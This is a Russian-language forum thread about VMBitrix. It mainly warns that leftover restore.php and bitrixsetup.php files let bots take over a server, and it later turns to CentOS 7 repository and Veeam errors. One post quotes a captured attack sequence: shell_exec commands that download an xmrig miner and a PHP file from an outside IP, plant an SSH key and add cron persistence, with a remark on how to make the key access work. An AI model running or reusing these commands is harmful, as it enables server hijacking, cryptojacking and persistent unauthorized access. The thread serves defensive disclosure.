VMBitrix 7.5.0 в релизе

Возможно еще актуально.
При установке битрикс-окружения в /home/bitrix/www  появляются restore.php и bitrixsetup.php
Они же создаются при создании сайта средствами /root/menu.sh
Файл restore.php позволяет восстановить из предварительно созданного бэкапа сайт.
Для развертывания никаких логинов паролей (в том числе и от пользователя сервера баз данных) не надо.

Что происходит?
Приходит робот из облака гугла или амазона.
Видит restore.php.
Разворачивает заранее сделанную копию сайта.
Идет в админку.
Это его сайт и у него есть возможность попасть в админку.
Запускает "командную строку php"
В ней:
echo shell_exec("cat /proc/cpuinfo | grep processor");
echo shell_exec("cat /proc/cpuinfo | grep model");
echo shell_exec("sudo -l");
echo shell_exec("curl -O http://178.154.215.30/auth_login");
echo shell_exec("mv auth_login auth_login.php");
echo shell_exec("ls /home/bitrix/www/bitrix/admin/ | grep auth_login.php");
echo shell_exec("cp /home/bitrix/www/bitrix/admin/auth_login.php /home/bitrix/www/");
echo shell_exec("ls /home/bitrix/www/ | grep auth_login.php");
echo shell_exec("curl -o /tmp/config.json http://178.154.215.30/config.json");
echo shell_exec("curl -o /tmp/xmrig http://178.154.215.30/xmrig");
echo shell_exec("chmod 777 /tmp/xmrig");
echo shell_exec("mkdir /home/bitrix/.ssh");
echo shell_exec("curl -O http://178.154.215.30/info");
echo shell_exec("cat info >> ~/.ssh/authorized_keys");
echo shell_exec("rm -rf info ");
echo shell_exec("curl -o /home/bitrix/sql_backup.sql http://178.154.215.30/sql_backup");
echo shell_exec("chmod 777 /home/bitrix/sql_backup.sql");
echo shell_exec("curl -O http://178.154.215.30/conf");
echo shell_exec("crontab -l >> conf");
echo shell_exec("crontab conf");
echo shell_exec("rm -rf conf");
echo shell_exec("crontab -l");
После этого:
$ crontab -l
# kletka-gym project
*/10 * * * * bash /home/bitrix/sql_backup.sql
а там внутри
wget -P /tmp https://github.com/.../xmrig-6.16.2-linux-static-x64.tar.gz
И еще чуть-чуть конфигов.

Вот как-то так.
Снято в 22 году с работающего майнера.
Замечу что в  данном случае после
echo shell_exec("cat info >> ~/.ssh/authorized_keys");
не хватает chmod 700 для .ssh и chmod 600 для authorized_keys
Для получения ssh по ключу.
Тогда майнер был не доработан.

Возникает вопрос что делать?
После установки битрикс-окружения/развертывания bitrix-vm
cd /home/bitrix/www
mv bitrixsetup.php bitrixsetup.php.1
mv restore.php restore.php.1

То же самое делать сразу же после создания сайта в его web_root.

1 июля 2024 года истек срок службы CentOS 7, и команда CentOS удалила свои зеркала из Интернета. Доступ к ним по-прежнему можно получить через vault.centos.org. Без обновления URL-адресов репозитория пакеты невозможно будет обновить или проверить, что приведет к ошибке: "Could not retrieve mirrorlist http://mirrorlist.centos.org ..."

ВАЖНО: Использовать репозиторий Vault  НЕ НУЖНО для того, чтобы оставаться на CentOS 7 дольше, чем требуется для перехода на новый сервер. Пакеты, предоставленные в репозитории vault не получают больше обновлений. Это означает, что программное обеспечение, установленное из репозитория Vault, будет иметь неисправленные уязвимости безопасности и другие ошибки.

для временного фикса базового репозитория можно использовать команды:

как? yum отвечает "Пакета с названием epel-release не найдено."

а у меня вот такая ошибка:

http://repository.veeam.com/backup/linux/agent/rpm/el/8/x86_64/repodata/repomd.xml: [Errno 14] HTTP Error 403 - Forbidden
Trying other mirror.
To address this issue please refer to the below wiki article

https://wiki.centos.org/yum-errors

If above article doesn't help to resolve this issue please use https://bugs.centos.org/.



One of the configured repositories failed (Veeam Backup for GNU/Linux - x86_64),
and yum doesn't have enough cached data to continue. At this point the only
safe thing yum can do is fail. There are a few ways to work "fix" this:

    1. Contact the upstream for the repository and get them to fix the problem.

    2. Reconfigure the baseurl/etc. for the repository, to point to a working
       upstream. This is most often useful if you are using a newer
       distribution release than is supported by the repository (and the
       packages for the previous distribution release still work).

    3. Run the command with the repository temporarily disabled
           yum --disablerepo=veeam ...

    4. Disable the repository permanently, so yum won't use it by default. Yum
       will then just ignore the repository until you permanently enable it
       again or use --enablerepo for temporary usage:

           yum-config-manager --disable veeam
       or
           subscription-manager repos --disable=veeam

    5. Configure the failing repository to be skipped, if it is unavailable.
       Note that yum will try to contact the repo. when it runs most commands,
       so will have to try and fail each time (and thus. yum will be be much
       slower). If it is a very temporary problem though, this is often a nice
       compromise:

           yum-config-manager --save --setopt=veeam.skip_if_unavailable=true

failure: repodata/repomd.xml from veeam: [Errno 256] No more mirrors to try.
http://repository.veeam.com/backup/linux/agent/rpm/el/8/x86_64/repodata/repomd.xml: [Errno 14] HTTP Error 403 - Forbidden

к репозиториям уже доступа нет? Старая версия всё? Для тестов нужна, кто нибудь ставил?

Подскажите пожалуйста, как можно установить 7.5.5?

Спасибо

Есть другая ветка, там это уже обсуждалось 100500 раз.
Висит скорее всего в автозапуске из папки bitrix.
Если пришел из пользователя битрикс, то это хорошая новость. Значит он мог прорваться через не обновленный сайт, без текущей защиты.
Все актульные версии битрикса хорошо защищены. За год не увидел ничего нового.
Скриншот этой папки bitrix пришли, содержимое.
То есть его можно найти запущенным в оперативной памяти.
Удаляешь процесс, удаляешь папки с вирусом, перезагружаешь... Наслаждаешься жизнью